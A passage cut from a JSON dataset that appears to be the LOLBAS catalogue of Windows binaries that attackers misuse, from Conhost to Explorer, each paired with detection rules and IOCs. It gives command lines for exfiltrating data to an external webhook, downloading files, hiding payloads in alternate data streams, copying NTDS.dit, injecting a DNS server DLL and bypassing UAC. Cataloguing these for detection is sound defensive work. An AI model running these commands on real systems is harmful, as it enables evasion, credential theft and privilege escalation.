Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"Resources":[{"Link":"https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads"},{"Link":"https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads"},{"Link":"https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor"},{"Link":"https://twitter.com/NtSetDefault/status/1302589153570365440?s=20"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"},{"Name":"Conhost.exe","Description":"Console Window host","Author":"Wietze Beukema","Created":"2022-04-05","Commands":[{"Command":"conhost.exe calc.exe","Description":"Execute calc.exe with conhost.exe as parent process","Usecase":"Use conhost.exe as a proxy binary to evade defensive counter-measures","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows 11"},{"Command":"conhost.exe --headless calc.exe","Description":"Execute calc.exe with conhost.exe as parent process","Usecase":"Specify --headless parameter to hide child process window (if applicable)","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\conhost.exe"}],"Detection":[{"IOC":"conhost.exe spawning unexpected processes"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"Resources":[{"Link":"https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/"},{"Link":"https://twitter.com/Wietze/status/1511397781159751680"},{"Link":"https://twitter.com/embee_research/status/1559410767564181504"},{"Link":"https://twitter.com/ankit_anubhav/status/1561683123816972288"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Conhost/"},{"Name":"Control.exe","Description":"Binary used to launch controlpanel items in Windows","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"control.exe c:\\windows\\tasks\\file.txt:evil.dll","Description":"Execute evil.dll which is stored in an Alternate Data Stream (ADS).","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","Category":"ADS","Privileges":"User","MitreID":"T1218.002","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\control.exe"},{"Path":"C:\\Windows\\SysWOW64\\control.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"IOC":"Control.exe executing files from alternate data streams"},{"IOC":"Control.exe executing library file without cpl extension"},{"IOC":"Suspicious network connections from control.exe"}],"Resources":[{"Link":"https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/"},{"Link":"https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/"},{"Link":"https://twitter.com/bohops/status/955659561008017409"},{"Link":"https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items"},{"Link":"https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Control/"},{"Name":"Csc.exe","Description":"Binary file used by .NET Framework to compile C# code","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"csc.exe -out:Output.exe File.cs","Description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe.","Usecase":"Compile attacker code on system. Bypass defensive counter measures.","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"csc -target:library File.cs","Description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file.","Usecase":"Compile attacker code on system. Bypass defensive counter measures.","Category":"Compile","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"IOC":"Csc.exe should normally not run as System account unless it is used for development."}],"Resources":[{"Link":"https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Csc/"},{"Name":"Cscript.exe","Description":"Binary used to execute scripts in Windows","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"cscript //e:vbscript c:\\ads\\file.txt:script.vbs","Description":"Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\cscript.exe"},{"Path":"C:\\Windows\\SysWOW64\\cscript.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Cscript.exe executing files from alternate data streams"},{"IOC":"DotNet CLR libraries loaded into cscript.exe"},{"IOC":"DotNet CLR Usage Log - cscript.exe.log"}],"Resources":[{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"},{"Link":"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Cscript/"},{"Name":"CustomShellHost.exe","Description":"A host process that is used by custom shells when using Windows in Kiosk mode.","Author":"Wietze Beukema","Created":"2021-11-14","Commands":[{"Command":"CustomShellHost.exe","Description":"Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.","Usecase":"Can be used to evade defensive counter-measures","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\CustomShellHost.exe"}],"Detection":[{"IOC":"CustomShellHost.exe is unlikely to run on normal workstations"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml"}],"Resources":[{"Link":"https://twitter.com/YoSignals/status/1381353520088113154"},{"Link":"https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"},{"Name":"DataSvcUtil.exe","Description":"DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.","Author":"Ialle Teixeira","Created":"2020-12-01","Commands":[{"Command":"DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile","Description":"Upload file, credentials or data exfiltration in general","Usecase":"Upload file","Category":"Upload","Privileges":"User","MitreID":"T1567","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"},{"IOC":"The DataSvcUtil.exe tool is installed in the .NET Framework directory."},{"IOC":"Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS."},{"IOC":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil."}],"Resources":[{"Link":"https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe"},{"Link":"https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services"},{"Link":"https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"},{"Name":"Desktopimgdownldr.exe","Description":"Windows binary used to configure lockscreen/desktop image","Author":"Gal Kristal","Created":"2020-06-28","Commands":[{"Command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr","Description":"Downloads the file and sets it as the computer's lockscreen","Usecase":"Download arbitrary files from a web server","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\desktopimgdownldr.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml"},{"IOC":"desktopimgdownldr.exe that creates non-image file"},{"IOC":"Change of HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl"}],"Resources":[{"Link":"https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"},{"Name":"DeviceCredentialDeployment.exe","Description":"Device Credential Deployment","Author":"Elliot Killick","Created":"2021-08-16","Commands":[{"Command":"DeviceCredentialDeployment","Description":"Grab the console window handle and set it to hidden","Usecase":"Can be used to stealthily run a console application (e.g. cmd.exe) in the background","Category":"Conceal","Privileges":"User","MitreID":"T1564","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\DeviceCredentialDeployment.exe"}],"Detection":[{"IOC":"DeviceCredentialDeployment.exe should not be run on a normal workstation"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"},{"Name":"Dfsvc.exe","Description":"ClickOnce engine in Windows used by .NET","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo","Description":"Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)","Usecase":"Use binary to bypass Application whitelisting","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf"},{"Link":"https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"},{"Name":"Diantz.exe","Description":"Binary that package existing files into a cabinet (.cab) file","Author":"Tamir Yehuda","Created":"2020-08-08","Commands":[{"Command":"diantz.exe c:\\pathToFile\\file.exe c:\\destinationFolder\\targetFile.txt:targetFile.cab","Description":"Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.","Usecase":"Hide data compressed into an Alternate Data Stream.","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.","Tags":[{"Type":"Compression"}]},{"Command":"diantz.exe \\\\remotemachine\\pathToFile\\file.exe c:\\destinationFolder\\file.cab","Description":"Download and compress a remote file and store it in a cab file on local machine.","Usecase":"Download and compress into a cab file.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019","Tags":[{"Type":"Compression"}]}],"Full_Path":[{"Path":"c:\\windows\\system32\\diantz.exe"},{"Path":"c:\\windows\\syswow64\\diantz.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"IOC":"diantz storing data into alternate data streams."},{"IOC":"diantz getting a file from a remote machine or the internet."}],"Resources":[{"Link":"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Diantz/"},{"Name":"Diskshadow.exe","Description":"Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"diskshadow.exe /s c:\\test\\diskshadow.txt","Description":"Execute commands using diskshadow.exe from a prepared diskshadow script.","Usecase":"Use diskshadow to exfiltrate data from VSS such as NTDS.dit","Category":"Dump","Privileges":"User","MitreID":"T1003.003","OperatingSystem":"Windows server"},{"Command":"diskshadow> exec calc.exe","Description":"Execute commands using diskshadow.exe to spawn child process","Usecase":"Use diskshadow to bypass defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows server"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\diskshadow.exe"},{"Path":"C:\\Windows\\SysWOW64\\diskshadow.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"IOC":"Child process from diskshadow.exe"}],"Resources":[{"Link":"https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"},{"Name":"Dnscmd.exe","Description":"A command-line interface for managing DNS servers","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\\\192.168.0.149\\dll\\wtf.dll","Description":"Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.","Usecase":"Remotely inject dll to dns server","Category":"Execute","Privileges":"DNS admin","MitreID":"T1543.003","OperatingSystem":"Windows server","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Dnscmd.exe"},{"Path":"C:\\Windows\\SysWOW64\\Dnscmd.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"},{"IOC":"Dnscmd.exe loading dll from UNC/arbitrary path"}],"Resources":[{"Link":"https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83"},{"Link":"https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html"},{"Link":"https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp"},{"Link":"https://twitter.com/Hexacorn/status/994000792628719618"},{"Link":"http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"},{"Name":"Esentutl.exe","Description":"Binary for working with Microsoft Joint Engine Technology (JET) database","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"esentutl.exe /y C:\\folder\\sourcefile.vbs /d C:\\folder\\destfile.vbs /o","Description":"Copies the source VBS file to the destination VBS file.","Usecase":"Copies files from A to B","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"esentutl.exe /y C:\\ADS\\file.exe /d c:\\ADS\\file.txt:file.exe /o","Description":"Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.","Usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"esentutl.exe /y C:\\ADS\\file.txt:file.exe /d c:\\ADS\\file.exe /o","Description":"Copies the source Alternate Data Stream (ADS) to the destination EXE.","Usecase":"Extract hidden file within alternate data streams","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"esentutl.exe /y \\\\192.168.100.100\\webdav\\file.exe /d c:\\ADS\\file.txt:file.exe /o","Description":"Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.","Usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"esentutl.exe /y \\\\live.sysinternals.com\\tools\\adrestore.exe /d \\\\otherwebdavserver\\webdav\\adrestore.exe /o","Description":"Copies the source EXE to the destination EXE file","Usecase":"Use to copy files from one unc path to another","Category":"Download","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d c:\\folder\\ntds.dit","Description":"Copies a (locked) file using Volume Shadow Copy","Usecase":"Copy/extract a locked file such as the AD Database","Category":"Copy","Privileges":"Admin","MitreID":"T1003.003","OperatingSystem":"Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\esentutl.exe"},{"Path":"C:\\Windows\\SysWOW64\\esentutl.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"Resources":[{"Link":"https://twitter.com/egre55/status/985994639202283520"},{"Link":"https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/"},{"Link":"https://twitter.com/bohops/status/1094810861095534592"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"},{"Name":"Eventvwr.exe","Description":"Displays Windows Event Logs in a GUI window.","Author":"Jacob Gajek","Created":"2018-11-01","Commands":[{"Command":"eventvwr.exe","Description":"During startup, eventvwr.exe checks the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.","Usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","Category":"UAC Bypass","Privileges":"User","MitreID":"T1548.002","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10","Tags":[{"Application":"GUI"}]},{"Command":"ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews & eventvwr.exe","Description":"During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net","Usecase":"Execute a command to bypass security restrictions that limit the use of command-line interpreters.","Category":"UAC Bypass","Privileges":"Administrator","MitreID":"T1548.002","OperatingSystem":"Windows 7, Windows 8, Windows 8.1, Windows 10","Tags":[{"Application":"GUI"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\eventvwr.exe"},{"Path":"C:\\Windows\\SysWOW64\\eventvwr.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"IOC":"eventvwr.exe launching child process other than mmc.exe"},{"IOC":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"Resources":[{"Link":"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"},{"Link":"https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1"},{"Link":"https://twitter.com/orange_8361/status/1518970259868626944"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"},{"Name":"Expand.exe","Description":"Binary that expands one or more compressed files","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"expand \\\\webdav\\folder\\file.bat c:\\ADS\\file.bat","Description":"Copies source file to destination.","Usecase":"Use to copies the source file to the destination file","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"expand c:\\ADS\\file1.bat c:\\ADS\\file2.bat","Description":"Copies source file to destination.","Usecase":"Copies files from A to B","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"expand \\\\webdav\\folder\\file.bat c:\\ADS\\file.txt:file.bat","Description":"Copies source file to destination Alternate Data Stream (ADS)","Usecase":"Copies files from A to B","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Expand.exe"},{"Path":"C:\\Windows\\SysWOW64\\Expand.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"Resources":[{"Link":"https://twitter.com/infosecn1nja/status/986628482858807297"},{"Link":"https://twitter.com/Oddvarmoe/status/986709068759949319"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Expand/"},{"Name":"Explorer.exe","Description":"Binary used for managing files and system components within Windows","Author":"Jai Minton","Created":"2020-06-24","Commands":[{"Command":"explorer.exe /root,\"C:\\Windows\\System32\\calc.exe\"","Description":"Execute calc.exe with the parent process spawning from a new instance of explorer.exe","Usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"explorer.exe C:\\Windows\\System32\\notepad.exe","Description":"Execute notepad.exe with the parent process spawning from a new instance of explorer.exe","Usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\explorer.exe"},{"Path":"C:\\Windows\\SysWOW64\\explorer.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"IOC":"Multiple instances of explorer.exe or explorer.exe using the /root command line is 